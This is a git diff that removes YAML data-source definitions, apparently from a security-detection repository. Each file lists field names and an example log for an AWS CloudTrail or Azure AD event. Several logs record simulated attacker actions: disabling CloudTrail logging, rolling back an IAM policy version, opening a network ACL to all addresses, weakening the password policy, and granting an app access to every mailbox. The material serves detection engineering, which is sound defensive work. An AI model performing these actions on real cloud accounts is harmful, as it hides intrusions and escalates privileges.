-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:49:49Z", "eventSource": "ec2.amazonaws.com", "eventName": "ReplaceNetworkAclEntry", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com", "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 20, "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol": "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "97b40da9-9291-4a92-8e9e-892b6887ffc9", "_return": true}, "requestID": "97b40da9-9291-4a92-8e9e-892b6887ffc9", "eventID": "46fe04b8-d007-4933-8bb8-c8b65c1121fa", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml
deleted file mode 100644
index 221853a5b1..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail SetDefaultPolicyVersion
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.policyArn
-- requestParameters.versionId
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLESDK2NOSX", "arn": "arn:aws:iam::111111111111:user/AtomicRedTeam", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKMZDMPVA", "userName": "AtomicRedTeam"}, "eventTime": "2021-03-02T21:05:49Z", "eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.set-default-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/VulnerablePolicy", "versionId": "v1"}, "responseElements": null, "requestID": "3bdf8738-2eab-4ae8-a858-2e2a4ccfc66b", "eventID": "742f6e55-4bc7-49e2-965f-56ffbc46a980", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml
deleted file mode 100644
index 99c24c1aa3..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml
+++ /dev/null
@@ -1,73 +0,0 @@
-event_name: AWS CloudTrail StopLogging
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.name
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-06-30T21:26:49Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging", "awsRegion": "us-west-2", "sourceIPAddress": "72.193.184.209", "userAgent": "stratus-red-team_a6a8f8f2-d560-4062-bd0d-c232130cfcc5", "requestParameters": {"name": "my-cloudtrail-trail"}, "responseElements": null, "requestID": "d8b79caa-08d2-4f7e-b93a-73bb7b85f260", "eventID": "9f8d2b82-6e9d-45b8-9055-78d8c00ca416", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml
deleted file mode 100644
index e4e2e47538..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: AWS CloudTrail UpdateAccountPasswordPolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.allowUsersToChangePassword
-- requestParameters.hardExpiry
-- requestParameters.minimumPasswordLength
-- requestParameters.requireLowercaseCharacters
-- requestParameters.requireNumbers
-- requestParameters.requireSymbols
-- requestParameters.requireUppercaseCharacters
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHZZ4THONS", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-26T22:10:41Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-01-26T22:38:59Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7", "userAgent": "AWS Internal", "requestParameters": {"minimumPasswordLength": 6, "requireSymbols": true, "requireNumbers": false, "requireUppercaseCharacters": false, "requireLowercaseCharacters": false, "allowUsersToChangePassword": false, "hardExpiry": false}, "responseElements": null, "requestID": "7685efa9-5c56-451a-bd25-3db520108589", "eventID": "ccc1d5c2-dd72-4798-8023-ed5a4205f2d5", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml
deleted file mode 100644
index ea7affff5a..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: AWS CloudTrail UpdateLoginProfile
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.userName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-03-05T01:02:59Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.update-login-profile", "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": null, "requestID": "08f38478-1749-4fb5-b07c-469d3448777a", "eventID": "033580e7-bbba-4b70-be63-7eeddb04b842", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml
deleted file mode 100644
index 88da9746e2..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: AWS CloudTrail UpdateSAMLProvider
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.sAMLMetadataDocument
-- requestParameters.sAMLProviderArn
-- responseElements.sAMLProviderArn
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLMZGPIW6C", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLKFUVAQAIJ", "arn": "arn:aws:iam::111111111111:role/rodonmicrotestrole", "accountId": "111111111111", "userName": "rodonmicrotestrole"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-20T03:10:32Z"}}}, "eventTime": "2021-01-20T03:12:39Z", "eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider", "awsRegion": "us-east-1", "sourceIPAddress": "66.176.252.11", "userAgent": "aws-internal/3 aws-sdk-java/1.11.930 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01 java/1.8.0_275 vendor/Oracle_Corporation", "requestParameters": {"sAMLMetadataDocument": "ncp+pf0e75KdoRTy1PQeu74OKXjcVNM+bnT7Ns6cwQI=J9PRCq201gGMzMtt4Ye+gsM7xOgrNvDg/usqIMvsyUy2r/MeTBz5FKCK+Okjwm49vyTWUoUioYGiwm/TD2Knv59g1zy+/OjZcmBJgDrCmksFJdkwG/fDlOZQNGuj2qh1CEKL5n6Ipy2z1dQ9XUmhhndtXNnjdZ0fJ9QWufWoxveSCLHcU7eUB9obwq96pbAp+6as0XreMNC/xPv5gDdHfKaIppsXtEwcZY7m1c25jDWqPUTQrtbVC0uryffg1Yu0JLTr646GMTzxulBSpQGRfNf5UT0bUiLtKngi++UHrngKdv3ovWwpVmY82JhG7rMDhkuWZu3LdEFvY3svNxGtsQ==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 mutable display name of the user.SubjectAn immutable, globally unique, non-reusable identifier of the user that is unique to the application for which a token is issued.Given NameFirst name of the user.SurnameLast name of the user.Display NameDisplay name of the user.Nick NameNick name of the user.Authentication InstantThe time (UTC) when the user is authenticated to Windows Azure Active Directory.Authentication MethodThe method that Windows Azure Active Directory uses to authenticate 
users.ObjectIdentifierPrimary identifier for the user in the directory. Immutable, globally unique, non-reusable.TenantIdIdentifier for the user''s tenant.IdentityProviderIdentity provider for the user.EmailEmail address of the user.GroupsGroups of the user.External Access TokenAccess token issued by external identity provider.External Access Token ExpirationUTC expiration time of access token issued by external identity provider.External OpenID 2.0 IdentifierOpenID 2.0 identifier issued by external identity provider.GroupsOverageClaimIssued when number of user''s group claims exceeds return limit.Role ClaimRoles that the user or Service Principal is attached toRoleTemplate Id ClaimRole template id of the Built-in Directory Roles that the user is a member ofhttps://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfedhttps://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-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://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfedhttps://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-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", "sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "responseElements": {"sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "requestID": "83d621ad-5b33-4ff0-acf4-0043cb432844", "eventID": "51b6d859-0cc4-4591-ba76-3494f3f43832", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml
deleted file mode 100644
index a4ad73333a..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: AWS CloudTrail UpdateTrail
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.includeGlobalServiceEvents
-- requestParameters.isMultiRegionTrail
-- requestParameters.name
-- responseElements.includeGlobalServiceEvents
-- responseElements.isMultiRegionTrail
-- responseElements.isOrganizationTrail
-- responseElements.logFileValidationEnabled
-- responseElements.name
-- responseElements.s3BucketName
-- responseElements.trailARN
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:42:26Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "UpdateTrail", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/cloudtrail.update-trail", "requestParameters": {"name": "Regulatory", "includeGlobalServiceEvents": true, "isMultiRegionTrail": true}, "responseElements": {"name": "Regulatory", "s3BucketName": "s3-for-cloudtrail-logs111", "includeGlobalServiceEvents": true, "isMultiRegionTrail": true, "trailARN": "arn:aws:cloudtrail:us-west-2:111111111111:trail/Regulatory", "logFileValidationEnabled": false, "isOrganizationTrail": false}, "requestID": "0da61466-5bba-43f9-b7e1-27437de120b2", "eventID": "ce02af60-f29e-4bc2-8b29-31c12f408fed", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml
deleted file mode 100644
index bd34e901bc..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Azure Active Directory Add app role assignment to service principal
-fields:
-- _time
-- Level
-- additional_details
-- additional_details_name
-- additional_details_value
-- category
-- command
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_type
-- durationMs
-- dvc
-- eventtype
-- host
-- id
-- identity
-- index
-- linecount
-- object_attrs
-- object_id
-- operationName
-- operationVersion
-- path_from_resourceId
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.app.appId
-- properties.initiatedBy.app.displayName
-- properties.initiatedBy.app.servicePrincipalId
-- properties.initiatedBy.app.servicePrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- result
-- resultSignature
-- result_id
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user_type
-- status
-- tag
-- tag::eventtype
-- tenantId
-- time
-- timeendpos
-- timestartpos
-- user_agent
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"time": "2024-02-08T21:49:53.7643129Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam", "operationName": "Add app role assignment to service principal", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "durationMs": 0, "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433", "identity": "LegacyTestOAuthApp", "Level": 4, "properties": {"id": "Directory_ed53faec-49b5-444f-b6af-b928558ca433_XH34Q_29215277", "category": "ApplicationManagement", "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433", "result": "success", "resultReason": "", "activityDisplayName": "Add app role assignment to service principal", "activityDateTime": "2024-02-08T21:49:53.7643129+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"app": {"appId": null, "displayName": "LegacyTestOAuthApp", "servicePrincipalId": "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "servicePrincipalName": null}}, "targetResources": [{"id": "8429eb5c-faeb-4ade-8eac-acc003790769", "displayName": "Office 365 Exchange Online", "type": "ServicePrincipal", "modifiedProperties": [{"displayName": "AppRole.Id", "oldValue": null, "newValue": "\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\""}, {"displayName": "AppRole.Value", "oldValue": null, "newValue": "\"full_access_as_app\""}, {"displayName": "AppRole.DisplayName", "oldValue": null, "newValue": "\"Use Exchange Web Services with full access to all mailboxes\""}, {"displayName": "AppRoleAssignment.CreatedDateTime", "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""}, {"displayName": "AppRoleAssignment.LastModifiedDateTime", "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""}, {"displayName": "ServicePrincipal.ObjectID", "oldValue": null, "newValue": "\"2e5c2fd0-cca4-452c-9891-a07c0dafd964\""}, {"displayName": "ServicePrincipal.DisplayName", "oldValue": null, 
"newValue": "\"STRT_Oauth\""}, {"displayName": "ServicePrincipal.AppId", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""}, {"displayName": "ServicePrincipal.Name", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""}, {"displayName": "TargetId.ServicePrincipalNames", "oldValue": null, "newValue": "\"https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com\""}], "administrativeUnits": []}, {"id": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "displayName": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "type": "ServicePrincipal", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:28:58 PST 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4"}, {"key": "AppId", "value": "00000002-0000-0ff1-ce00-000000000000"}]}}'
